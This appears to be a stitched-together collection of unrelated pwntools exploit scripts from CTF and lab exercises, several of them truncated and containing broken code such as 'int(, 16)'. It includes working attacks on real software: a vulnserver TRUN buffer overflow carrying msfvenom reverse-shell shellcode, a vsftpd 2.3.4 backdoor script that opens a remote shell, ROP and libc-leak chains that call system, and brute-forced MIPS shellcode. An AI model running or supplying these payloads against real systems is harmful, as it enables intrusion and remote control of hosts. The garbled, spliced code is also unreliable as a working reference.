r.recvline() == "Dictionary created\n": raise RuntimeError("Can't create dictionary 1") for (word_from, word_to1, word_to2) in words: r.send("add {} {}\n".format(word_from, word_to1)) if not r.recvline() == "Word saved!\n": raise RuntimeError("Can't store word") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_after_translate_1: raise RuntimeError("Wrong translation after adding words") r.send("dict {}\n".format(dict_id2)) info = r.recvline() m = re.match( "Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n') if not r.recvline() == "Dictionary created\n": raise RuntimeError("Can't create dictionary 2") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_without_translate: raise RuntimeError("Wrong translation after switching dictionaries") for (word_from, word_to1, word_to2) in words: r.send("add {} {}\n".format(word_from, word_to2)) if not r.recvline() == "Word saved!\n": raise RuntimeError("Can't store word") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_after_translate_2: raise RuntimeError( "Wrong translation after adding words to another dictionary") r.send("quit\n") if not r.recvall() == "Good bye!\n": raise RuntimeError("Wrong goodbye") r = pwn.remote(ip, port) if not r.recvline() == 'Welcome to the NADMOZG translator service!\n': raise RuntimeError("Wrong banner") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_without_translate: raise RuntimeError( "Wrong default translation after words added to another dictionary" ) r.send("dict {}\n".format(dict_id1)) info = r.recvline() m = re.match( "Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n') if not r.recvline() == "Dictionary exists and password doesn't match\n": raise RuntimeError("Wrong message after wrong password") if not r.recvline() == "Dictionary not loaded\n": raise RuntimeError("Wrong message after wrong password") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_without_translate: raise RuntimeError("Wrong translation after wrong password attempt") r.send("dict {}\n".format(dict_id1)) info = r.recvline() m = re.match( "Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(pwd1 + 'XXX\n') if not r.recvline() == 'Please input only hexadecimal characters\n': raise RuntimeError("Wrong message after invalid password") if not r.recvline() == "Dictionary not loaded\n": raise RuntimeError("Wrong message after invalid password") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_without_translate: raise RuntimeError("Wrong translation after invalid password attempt") r.send("dict {}\n".format(dict_id1)) info = r.recvline() m = re.match( "Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n') if not r.recvline() == 'Password ok!\n': raise RuntimeError("Can't load dictionary") if not r.recvline() == 'Dictionary loaded\n': raise RuntimeError("Can't load dictionary") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_after_translate_1: raise RuntimeError("Wrong translation after loading stored dictionary") r.send("dict {}\n".format(dict_id2)) info = r.recvline() m = re.match( "Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n') if not r.recvline() == 'Password ok!\n': raise RuntimeError("Can't load dictionary") if not r.recvline() == 'Dictionary loaded\n': raise RuntimeError("Can't load dictionary") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_after_translate_2: raise RuntimeError("Wrong translation after loading stored dictionary") r.send("quit\n") if not r.recvall() == "Good bye!\n": raise RuntimeError("Wrong goodbye")
import pwn import struct import time import subprocess import re LOCAL = False if LOCAL: sh = pwn.process('hive') else: sh = pwn.remote('', 5000) def get_timestamp_hash (timestamp) : proc = subprocess.Popen('./hive_patched', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) stdout, stderr = proc.communicate(struct.pack('<L', timestamp)) return stdout[-33:] def login(sh): initial = sh.recv(1024) timestr = re.findall('time is: (.*?),', initial)[0] print '[+] timestr', timestr timehash = get_timestamp_hash(int(timestr)) print '[+] timehash', timehash sh.sendline('username') sh.sendline('5up3rm@n') sh.sendline(timehash) def build_rop(): pack = struct.pack
#!/usr/bin/env python3 from pwn import remote import os RHOST = "" RPORT = 9999 socket = remote(RHOST,RPORT) # ./ -p bruijn -l 4000 -a 123456789 pattern = b"1111211131114111511161117111811191122112311241125112611271128112911321133113411351136113711381139114211431144114511461147114811491152115311541155115611571158115911621163116411651166116711681169117211731174117511761177117811791182118311841185118611871188118911921193119411951196119711981199121213121412151216121712181219122212231224122512261227122812291232123312341235123612371238123912421243124412451246124712481249125212531254125512561257125812591262126312641265126612671268126912721273127412751276127712781279128212831284128512861287128812891292129312941295129612971298129913131413151316131713181319132213231324132513261327132813291332133313341335133613371338133913421343134413451346134713481349135213531354135513561357135813591362136313641365136613671368136913721373137413751376137713781379138213831384138513861387138813891392139313941395139613971398139914141514161417141814191422142314241425142614271428142914321433143414351436143714381439144214431444144514461447144814491452145314541455145614571458145914621463146414651466146714681469147214731474147514761477147814791482148314841485148614871488148914921493149414951496149714981499151516151715181519152215231524152515261527152815291532153315341535153615371538153915421543154415451546154715481549155215531554155515561557155815591562156315641565156615671568156915721573157415751576157715781579158215831584158515861587158815891592159315941595159615971598159916161716181619162216231624162516261627162816291632163316341635163616371638163916421643164416451646164716481649165216531654165516561657165816591662166316641665166616671668166916721673167416751676167716781679168216831684168516861687168816891692169316941695169616971698169917171817191722172317241725172617271728172917321733173417351736173717381739174217431744174517461747174817491752175317541755175617571758175917621763176417651766176717681769177217731774177517761777177817791782178317841785178617871788178917921793179417951796179717981799181819182218231824182518261827182818291832183318341835183618371838183918421843184418451846184718481849185218531854185518561857185818591862186318641865186618671868186918721873187418751876187718781879188218831884188518861887188818891892189318941895189618971898189919192219231924192519261927192819291932193319341935193619371938193919421943194419451946194719481949195219531954195519561957195819591962196319641965196619671968196919721973197419751976197719781979198219831984198519861987198819891992199319941995199619971998199922223222422252226222722282229223322342235223622372238223922432244224522462247224822492253225422552256225722582259226322642265226622672268226922732274227522762277227822792283228422852286228722882289229322942295229622972298229923232423252326232723282329233323342335233623372338233923432344234523462347234823492353235423552356235723582359236323642365236623672368236923732374237523762377237823792383238423852386238723882389239323942395239623972398239924242524262427242824292433243424352436243724382439244324442445244624472448244924532454245524562457245824592463246424652466246724682469247324742475247624772478247924832484248524862487248824892493249424952496249724982499252526252725282529253325342535253625372538253925432544254525462547254825492553255425552556255725582559256325642565256625672568256925732574257525762577257825792583258425852586258725882589259325942595259625972598259926262726282629263326342635263626372638263926432644264526462647264826492653265426552656265726582659266326642665266626672668266926732674267526762677267826792683268426852686268726882689269326942695269626972698269927272827292733273427352736273727382739274327442745274627472748274927532754275527562757275827592763276427652766276727682769277327742775277627772778277927832784278527862787278827892793279427952796279727982799282829283328342835283628372838283928432844284528462847284828492853285428552856285728582859286328642865286628672868286928732874287528762877287828792883288428852886288728882889289328942895289628972898289929293329342935293629372938293929432944" # always check bad chars !!! badchars = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" # msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=8990 EXITFUNC=thread -a x86 -f c -b "\x00" rev_shell2 = b"\xba\x33\x40\xe5\x4b\xda\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x0e\x03\x63\x4e\x07\xbe\x7f\xa6\x45\x41\x7f\x37\x2a\xcb\x9a\x06\x6a\xaf\xef\x39\x5a\xbb\xbd\xb5\x11\xe9\x55\x4d\x57\x26\x5a\xe6\xd2\x10\x55\xf7\x4f\x60\xf4\x7b\x92\xb5\xd6\x42\x5d\xc8\x17\x82\x80\x21\x45\x5b\xce\x94\x79\xe8\x9a\x24\xf2\xa2\x0b\x2d\xe7\x73\x2d\x1c\xb6\x08\x74\xbe\x39\xdc\x0c\xf7\x21\x01\x28\x41\xda\xf1\xc6\x50\x0a\xc8\x27\xfe\x73\xe4\xd5\xfe\xb4\xc3\x05\x75\xcc\x37\xbb\x8e\x0b\x45\x67\x1a\x8f\xed\xec\xbc\x6b\x0f\x20\x5a\xf8\x03\x8d\x28\xa6\x07\x10\xfc\xdd\x3c\x99\x03\x31\xb5\xd9\x27\x95\x9d\xba\x46\x8c\x7b\x6c\x76\xce\x23\xd1\xd2\x85\xce\x06\x6f\xc4\x86\xeb\x42\xf6\x56\x64\xd4\x85\x64\x2b\x4e\x01\xc5\xa4\x48\xd6\x2a\x9f\x2d\x48\xd5\x20\x4e\x41\x12\x74\x1e\xf9\xb3\xf5\xf5\xf9\x3c\x20\x59\xa9\x92\x9b\x1a\x19\x53\x4c\xf3\x73\x5c\xb3\xe3\x7c\xb6\xdc\x8e\x87\x51\x23\xe6\x87\xca\xcb\xf5\x87\x2f\x12\x73\x61\x45\x3a\xd5\x3a\xf2\xa3\x7c\xb0\x63\x2b\xab\xbd\xa4\xa7\x58\x42\x6a\x40\x14\x50\x1b\xa0\x63\x0a\x8a\xbf\x59\x22\x50\x2d\x06\xb2\x1f\x4e\x91\xe5\x48\xa0\xe8\x63\x65\x9b\x42\x91\x74\x7d\xac\x11\xa3\xbe\x33\x98\x26\xfa\x17\x8a\xfe\x03\x1c\xfe\xae\x55\xca\xa8\x08\x0c\xbc\x02\xc3\xe3\x16\xc2\x92\xcf\xa8\x94\x9a\x05\x5f\x78\x2a\xf0\x26\x87\x83\x94\xae\xf0\xf9\x04\x50\x2b\xba\x25\xb3\xf9\xb7\xcd\x6a\x68\x7a\x90\x8c\x47\xb9\xad\x0e\x6d\x42\x4a\x0e\x04\x47\x16\x88\xf5\x35\x07\x7d\xf9\xea\x28\x54" payload = b"" payload += b"TRUN /.:/" payload += pattern[:2003] payload += b"\xaf\x11\x50\x62"#625011AF payload += b"\x90"*32 payload += rev_shell2 print("[-] Sending buffer with a length of: " + str(len(payload))) socket.send(payload) print("[+] Buffer sent.") socket.close()
def __init__(self, host, port): print colored('>> Happy pwning !', 'cyan') self.conn = pwn.remote(host, port)
import pwn # conn = pwn.process('./vuln') conn = pwn.remote('', 30638) print(conn.recvline()) ss = 'a' * (0x9b1c - 0x9a60) ss += pwn.p32(0x080491e2) # flag函数地址,这个地址因为栈溢出而被修改 ss += pwn.p32(0x08049313) # vuln函数地址 ss += pwn.p32(0xdeadbeef) # 在flag函数中会对比[ebp+0x8] ss += pwn.p32(0xc0ded00d) # 在flag函数中会对比[ebp+0xc] conn.sendline(ss) print(conn.recv()) print(conn.recv()) conn.sendline('123') conn.recvline()
import pwn import base64 import os print "Started!" r = pwn.remote("", 8001) print(r.recvline()) print(r.recvline()) print(r.recvline()) print(r.recvline()) print(r.recvline()) print(r.recvline()) print(r.recvline()) print(r.recvline()) print(r.recvline()) print('GETTING HELP') r.sendline('help') print(r.recvline()) print('RECV HELP') l2 = r.recvuntil(', \'exit\', or \'help\'.', timeout=2) print(l2) print('CREATING FILE') f = open('/root/Desktop/github/RT_CTF/csaw/aui', 'wb') f.write(l2) f.close()
def init(args): p = remote(, 8888, level='error') return p
def connect(): if LOCAL: return pwn.remote('', 1337) else: return pwn.remote('', 1337)
#!/usr/bin/env python import pwn import re host, port = '', 15853 s = pwn.remote(host, port) prompt = s.recv() print prompt binary = re.findall('the (.*) as a word', prompt)[0] answer = hex(int(binary.replace(' ', ''),2))[2:].decode('hex') s.sendline(answer) prompt = s.recv() print prompt hexadecimal = re.findall('the (.*) as a word', prompt)[0] print hexadecimal.decode('hex') s.sendline(answer) prompt = s.recv() print prompt octal = re.findall('the (.*) as a word', prompt)[0]
def connect(self, ip, port_no): self.conn = pwn.remote(ip, port_no)
def leak(addr): global stack_addr func_addr = 0x080498a6 index = (stack_addr + 0x20 - command) // 4 payload = str(index).ljust(0x10, 'A').encode() payload += pwn.p32(func_addr) + pwn.p32(0x0) payload += pwn.p32(elf.plt[b'write']) + pwn.p32(elf.sym[b'main']) payload += pwn.p32(1) + pwn.p32(addr) + pwn.p32(0x4) stack_addr -= 0xf0 io.recvuntil('> ') io.sendline(payload) return io.recv(4) command = 0x08058154 io = pwn.remote('', 10202) stack_addr = leak_stack() dynelf = pwn.DynELF(leak, elf=elf) system_addr = dynelf.lookup(b'system', b'libc') index = (stack_addr + 0x60 - command) // 4 payload = (str(index).encode() + b';/bin/cat /home/starbound/flag\x00').ljust( 0x50, b'A') + pwn.p32(system_addr) io.recvuntil('> ') io.sendline(payload) io.interactive()
import time, pwn, os, struct local = False if local: s = pwn.remote("localhost", 2323) os.system("echo nye; pgrep messenger; echo bye") raw_input("> ") else: s = pwn.remote("", 3333) print s.recvuntil(">> ") def allocate_note(s, size, msg): s.send("L\n") print s.recv(1024) s.send("{}\n".format(size)) print s.recv(1024) s.send("{}\n".format(msg)) print s.recvuntil(">> ") def change_note(s, index, size, msg): s.send("C\n") print s.recv(1024) s.send("{}\n".format(index)) print s.recv(1024) s.send("{}\n".format(size)) print s.recv(1024) s.send("{}\n".format(msg)) print s.recvuntil(">> ") def remove_note(s, index): s.send("R\n")
#!/usr/bin/python3 import pwn HOST, PORT = '', 5002 DEBUG = False libc = pwn.ELF('./') if DEBUG: env = {'LD_PRELOAD': './'} p = pwn.process(['./', './challenge'], env=env) else: p = pwn.remote(HOST, PORT) pwn.context.log_level = 'debug' def Menu(i): p.recvuntil('5) Checkout!\n') if exploit: p.sendline('0' * (i - 1)) p.recvline() else: p.sendline(str(i)) def Malloc(name): assert len(name) <= 0xF8 Menu(1) p.recvuntil('Name of the book?\n')
#!/usr/bin/env python3 import pwn import sys pwn.context.endian = 'big' SHELL_CODE = b'\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xf4\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf8\xaf\xa0\xff\xfc\x27\xa4\xff\xf4\x28\x05\xff\xff\x24\x02\x0f\xab\x00\x00\x00\x0c' for i in range(4092, 0, -4): p = pwn.remote('host', 12345) print(p.recvuntil(b'name:')) payload = b'a' * 20 payload += pwn.p32(0x7ffff000 + i) payload += SHELL_CODE p.sendline(payload) p.sendline(b'echo test_shell') r = p.recvline() if b'test_shell' in r: p.sendline(b'cat .passwd') print(p.recvline()) p.close() break else: p.close()
def solve(): r = pwn.remote('', 8308) generator = random.Random() generator.seed() # Seed from current time while True: l = r.recvline().strip('\n') print(l) if(l == 'I need a new Visa!'): r.writeline(cg.credit_card_number(generator, cg.visaPrefixList, 16, 1)[0]) continue if(l == 'I need a new Discover!'): r.writeline(cg.credit_card_number(generator, cg.discoverPrefixList, 16, 1)[0]) continue if(l == 'I need a new MasterCard!'): r.writeline(cg.credit_card_number(generator, cg.mastercardPrefixList, 16, 1)[0]) continue if(l == 'I need a new American Express!'): r.writeline(cg.credit_card_number(generator, cg.amexPrefixList, 15, 1)[0]) continue if(l.startswith('I need a new card that starts with')): numberpart = l.replace('I need a new card that starts with ','').replace('!','') result = '' if(numberpart.startswith('2') or numberpart.startswith('3') or numberpart.startswith('4') or numberpart.startswith('5') or numberpart.startswith('7') or numberpart.startswith('8') or numberpart.startswith('9')): result = cg.completed_number(list(numberpart), 16) if(numberpart.startswith('6') or numberpart.startswith('1')): result = cg.completed_number(list(numberpart), 15) print('NumberPart = {}, result={}'.format(numberpart, result)) r.writeline(result) continue if(l.startswith('I need a new card which ends with')): numberpart = l.replace('I need a new card which ends with ', '').replace('!', '') if(len(numberpart) == 1): cards = cg.credit_card_number(generator, cg.mastercardPrefixList, 16, 100) card = next((x for x in cards if x.endswith(numberpart)), None) print('NumberPart = {}, card={}'.format(numberpart, card)) r.writeline(card) continue while True: part_without_last = numberpart[0:len(numberpart)-1] tcard = cg.completed_number_behind(list(part_without_last), 16) print('NumberPart = {}, card={}'.format(numberpart, tcard)) if(tcard.startswith('0')): continue if(tcard.endswith(numberpart)): r.writeline(tcard) break continue if(l.startswith('I need to know if')): numberpart = l.replace('I need to know if ', '').replace(' is valid! (0 = No, 1 = Yes)', '') print (numberpart) answer = is_valid(numberpart) print ('NumberPart = {}, is_valid = {}'.format(numberpart, answer)) r.writeline(answer) continue if(l == 'Thanks!'): continue if(l == 'True'): continue if(l == 'False'): continue if(l == "Hmmmmm that doesn't seem correct..."): continue raise Exception('Unknown command')
from utils.basics import hex_to_ascii from utils.rsa.rsa_lsb_oracle import lsboracle from pwn import remote r = remote("", 5000) def comm(msg: int) -> int: r.sendline(str(msg)) return int(r.recvline().decode().strip().strip('>').strip()) def main(): flag = int(r.recvline().decode().split(": ")[1].strip()) assert r.recvline() == b'One encrypt:\n' r.recvuntil("m => ") r.sendline("-1") N = int(r.recvline()) + 1 print("N:", N) assert r.recvline() == b'Alot of unhelpful decrypts:\n' dec = lsboracle(flag, comm, 65537, N) print(dec) print(hex_to_ascii(dec)) if __name__ == "__main__": main()
def benign(ip, port): def rand_str(): return ''.join(random.choice(string.ascii_letters) for i in range(30)) pwn.context(timeout=10) word_cnt = random.randrange(3, 10) words = [] for i in range(word_cnt): words.append([rand_str(), rand_str(), rand_str()]) dict_id1 = rand_str() pwd1 = rand_str() dict_id2 = rand_str() pwd2 = rand_str() str_to_translate = " ".join([x[0] for x in words]) str_after_translate_1 = " ".join([x[1] for x in words]) str_after_translate_2 = " ".join([x[2] for x in words]) str_without_translate = str_to_translate r = pwn.remote(ip, port) if not r.recvline() == 'Welcome to the NADMOZG translator service!\n': raise RuntimeError("Wrong banner") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_without_translate: raise RuntimeError("Wrong default translation") r.send("dict {}\n".format(dict_id1)) info = r.recvline() m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n') if not r.recvline() == "Dictionary created\n": raise RuntimeError("Can't create dictionary 1") for (word_from, word_to1, word_to2) in words: r.send("add {} {}\n".format(word_from, word_to1)) if not r.recvline() == "Word saved!\n": raise RuntimeError("Can't store word") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_after_translate_1: raise RuntimeError("Wrong translation after adding words") r.send("dict {}\n".format(dict_id2)) info = r.recvline() m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n') if not r.recvline() == "Dictionary created\n": raise RuntimeError("Can't create dictionary 2") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_without_translate: raise RuntimeError("Wrong translation after switching dictionaries") for (word_from, word_to1, word_to2) in words: r.send("add {} {}\n".format(word_from, word_to2)) if not r.recvline() == "Word saved!\n": raise RuntimeError("Can't store word") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_after_translate_2: raise RuntimeError("Wrong translation after adding words to another dictionary") r.send("quit\n") if not r.recvall() == "Good bye!\n": raise RuntimeError("Wrong goodbye") r = pwn.remote(ip, port) if not r.recvline() == 'Welcome to the NADMOZG translator service!\n': raise RuntimeError("Wrong banner") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_without_translate: raise RuntimeError("Wrong default translation after words added to another dictionary") r.send("dict {}\n".format(dict_id1)) info = r.recvline() m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n') if not r.recvline() == "Dictionary exists and password doesn't match\n": raise RuntimeError("Wrong message after wrong password") if not r.recvline() == "Dictionary not loaded\n": raise RuntimeError("Wrong message after wrong password") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_without_translate: raise RuntimeError("Wrong translation after wrong password attempt") r.send("dict {}\n".format(dict_id1)) info = r.recvline() m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(pwd1 + 'XXX\n') if not r.recvline() == 'Please input only hexadecimal characters\n': raise RuntimeError("Wrong message after invalid password") if not r.recvline() == "Dictionary not loaded\n": raise RuntimeError("Wrong message after invalid password") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_without_translate: raise RuntimeError("Wrong translation after invalid password attempt") r.send("dict {}\n".format(dict_id1)) info = r.recvline() m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n') if not r.recvline() == 'Password ok!\n': raise RuntimeError("Can't load dictionary") if not r.recvline() == 'Dictionary loaded\n': raise RuntimeError("Can't load dictionary") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_after_translate_1: raise RuntimeError("Wrong translation after loading stored dictionary") r.send("dict {}\n".format(dict_id2)) info = r.recvline() m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n') if not r.recvline() == 'Password ok!\n': raise RuntimeError("Can't load dictionary") if not r.recvline() == 'Dictionary loaded\n': raise RuntimeError("Can't load dictionary") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_after_translate_2: raise RuntimeError("Wrong translation after loading stored dictionary") r.send("quit\n") if not r.recvall() == "Good bye!\n": raise RuntimeError("Wrong goodbye")
#!/usr/bin/python3 from pwn import log,remote from sys import argv,exit from time import sleep if len(argv) < 2: exit(f'Usage: {argv[0]} Target_IP') p = log.progress("Running") vsftpd = remote(argv[1], 21) p.status('Checking Version') recv = vsftpd.recvuntil(")",timeout=5) version = (recv.decode()).split(" ")[2].replace(")","") if version != '2.3.4': exit('2.3.4 Version Not Found') vsftpd.sendline('USER hii:)') vsftpd.sendline('PASS hello') p.status('Backdoor Activated') sleep(3) backdoor = remote(argv[1], 6200) p.success("Got Shell!!!") backdoor.interactive()
import pwn r = pwn.remote('', 50031) turnToShop = 1 while True: try: print( '--------------------------------------------------------------------------------' ) msg = r.recv().decode() print(msg) msg = msg.split() gold = msg[msg.index('Gold:') + 1] level = msg[msg.index('level:') + 1] # print(msg) print('Gold : ', gold) print('Level : ', level) # browse the shop if level == '0': if turnToShop == 1: print('Browsing the shop...') turnToShop = 0 r.sendline('6') else: print('Buying sword...') turnToShop = 1 r.sendline('1') elif level == '1': if int(gold) < 1000: print('Going on a journey...') r.sendline('5')